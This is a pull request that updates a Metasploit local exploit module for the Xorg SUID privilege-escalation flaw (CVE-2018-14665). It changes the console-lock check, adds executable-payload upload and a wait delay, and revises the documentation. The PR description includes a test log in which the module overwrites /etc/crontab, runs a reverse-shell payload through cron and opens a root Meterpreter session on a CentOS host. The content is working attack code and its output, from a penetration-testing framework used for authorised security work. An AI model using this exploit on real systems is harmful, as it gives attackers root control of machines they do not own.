### PR TITLE
Improve Xorg_privesc module consolelock check, payload upload & formatting 

### DIFF
--- a/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md
+++ b/documentation/modules/exploit/multi/local/xorg_x11_suid_server.md
@@ -7,7 +7,7 @@
 
   Xorg (commonly referred as simply X) is the most popular display server among Linux users. Its ubiquity has led to making it an ever-present requisite for GUI applications, resulting in massive adoption from most distributions.  
 
-  Xorg is more restrictive to exploit under CentOS.  The user must have console lock and SeLinux may interfere.
+  Xorg is more restrictive to exploit under CentOS.  The user must have console lock and SeLinux may interfere.  If Selinux is enforcing crontabs context will be changed on exploit and you will be unable to clean it.  
 
   This module has been tested successfully on:
 

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -5,6 +5,7 @@
 
 class MetasploitModule < Msf::Exploit::Local
   Rank = GoodRanking
+  include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
   include Msf::Post::File
   include Msf::Post::Linux::Priv
@@ -22,15 +23,17 @@ class MetasploitModule < Msf::Exploit::Local
         the ability to elevate privileges and run arbitrary code under root
         privileges.
 
-        This module has been tested with OpenBSD 6.3,6.4,and CentOS 7.
+        This module has been tested with OpenBSD 6.3, 6.4, and CentOS 7 (1708).
         CentOS default install will require console auth for the users session.
         Cron launches the payload so if Selinux is enforcing exploitation
-        may still be possible, but the module will bail.  On exploitation
-        crontab.old will be created.  The script will remove .old and restore
-        crontab after exploit.  Xorg must have SUID permissions and may not
-        start if running.  On successful exploitation artifacts will be created
-        consistant with starting Xorg and running a cron.
+        may still be possible, but the module will bail.
+        Xorg must have SUID permissions and may not start if running.
 
+        On exploitation a crontab.old backup file will be created by Xorg.
+        This module will remove the .old file and restore crontab after
+        successful exploitation. Failed exploitation may result in a corrupted
+        crontab. On successful exploitation artifacts will be created consistant
+        with starting Xorg and running a cron.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -45,12 +48,15 @@ class MetasploitModule < Msf::Exploit::Local
         [
            [ 'CVE', '2018-14665' ],
            [ 'BID', '105741' ],
+           [ 'EDB', '45697' ],
+           [ 'EDB', '45742' ],
+           [ 'EDB', '45832' ],
            [ 'URL', 'https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html' ],
            [ 'URL', 'https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm' ]
         ],
-      'Platform'       =>  %w(openbsd linux),
+      'Platform'       =>  %w[openbsd linux],
       'Arch'           =>  [ARCH_CMD, ARCH_X86, ARCH_X64],
-      'SessionTypes'   =>  %w(shell meterpreter),
+      'SessionTypes'   =>  %w[shell meterpreter],
       'Targets'        =>
         [
            ['OpenBSD', {
@@ -70,23 +76,23 @@ class MetasploitModule < Msf::Exploit::Local
       'DefaultTarget'  => 0))
 
      register_advanced_options(
-      [
+       [
          OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
          OptString.new('Xdisplay', [ true, 'Display exploit will attempt to use', ':1' ]),
          OptBool.new('ConsoleLock', [ true, 'Will check for console lock under linux', true ])
-      ]
-    )
+       ]
+     )
   end
 
 
   def check
 
-    #selinux check
+    # linux checks
     uname = cmd_exec "uname"
     if uname =~ /linux/i
       vprint_status "Running additional check for Linux"
-      unless datastore['ConsoleLock'] == false
-        user = get_env 'USER'
+      if datastore['ConsoleLock']
+        user = cmd_exec "id -un"
         unless exist? "/var/run/console/#{user}"
           vprint_error "No console lock for #{user}"
           return CheckCode::Safe
@@ -102,7 +108,7 @@ class MetasploitModule < Msf::Exploit::Local
       vprint_good "Selinux is not an issue"
     end
 
-    #suid program check
+    # suid program check
     xorg_path = cmd_exec "command -v Xorg"
     unless xorg_path.include?("Xorg")
       vprint_error "Could not find Xorg executable"
@@ -115,7 +121,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good "Xorg binary #{xorg_path} is SUID"
 
-    #version check
+    # version check
     x_version = cmd_exec "Xorg -version"
     if x_version.include?("Release Date")
       v = Gem::Version.new(x_version.scan(/\d\.\d+\.\d+/).first)
@@ -134,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good "Xorg version #{v} is vulnerable"
 
-    #process check for /X
+    # process check for /X
     proc_list = cmd_exec "ps ax"
     if proc_list.include?('/X ')
       vprint_warning('Xorg in process list')
@@ -179,9 +185,13 @@ class MetasploitModule < Msf::Exploit::Local
     @clean_up = "/bin/cat #{pscript}.b > /etc/crontab ; /bin/rm -f #{pscript}.b /etc/crontab.old"
     xdisplay = datastore['Xdisplay']
 
-    #Uploading file crontab will run
+    # Uploading file crontab will run
     print_status 'Uploading your payload, this could take a while'
-    write_file(pscript,payload.encoded)
+    if payload.arch.first == 'cmd'
+      write_file(pscript, payload.encoded)
+    else
+      write_file(pscript, generate_payload_exe)
+    end
     register_file_for_cleanup pscript
     chmod pscript
 

--- a/modules/exploits/multi/local/xorg_x11_suid_server.rb
+++ b/modules/exploits/multi/local/xorg_x11_suid_server.rb
@@ -71,7 +71,8 @@ class MetasploitModule < Msf::Exploit::Local
         ],
       'DefaultOptions' =>
         {
-          'PAYLOAD' => 'cmd/unix/reverse_openssl'
+          'PAYLOAD' => 'cmd/unix/reverse_openssl',
+          'WfsDelay' => 120
         },
       'DefaultTarget'  => 0))
 
@@ -209,12 +210,6 @@ class MetasploitModule < Msf::Exploit::Local
       print_error 'Deleting crontab backup'
       fail_with Failure::NotVulnerable, '/etc/crontab not modified'
     end
-    print_good '/etc/crontab overwrite successful'
-
-    12.times do
-      print_status 'Waiting on cron to run'
-      Rex.sleep 10
-      break if session_created?
-    end
+    print_good '/etc/crontab overwrite successful. Waiting for job to run (may take a minute)...'
   end
 end


### PR DESCRIPTION
Was asked to make some adjustments to the check for console lock along with payload upload and formatting.   Adjusted and then tested on CentOS and OpenBSD6.4.  

```
msf5 exploit(multi/local/xorg_x11_suid_server) > exploit 

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 172.30.0.2:4444 
[*] Running additional check for Linux
[+] Console lock for peep
[+] Selinux is not an issue
[+] Xorg path found at /usr/bin/Xorg
[+] Xorg binary /usr/bin/Xorg is SUID
[+] Xorg version 1.19.5 is vulnerable
[+] Xorg does not appear running
[+] Passed all initial checks for exploit
[*] Uploading your payload, this could take a while
[*] Max line length is 65537
[*] Writing 911224 bytes in 56 chunks of 39672 bytes (octal-encoded), using printf
[*] Next chunk is 43977 bytes
....... snipped ............
[*] Next chunk is 40137 bytes
[*] Trying /etc/crontab overwrite
[+] /etc/crontab overwrite successful
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Waiting on cron to run
[*] Meterpreter session 2 opened (172.30.0.2:4444 -> 172.30.0.60:40608) at 2018-11-24 14:44:13 -0600
[+] Returning session after cleaning
[+] Deleted /tmp/.session-zJFbtiW

meterpreter > cat /etc/crontab
original
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : CentOS 7.5.1804 (Linux 3.10.0-862.el7.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 
```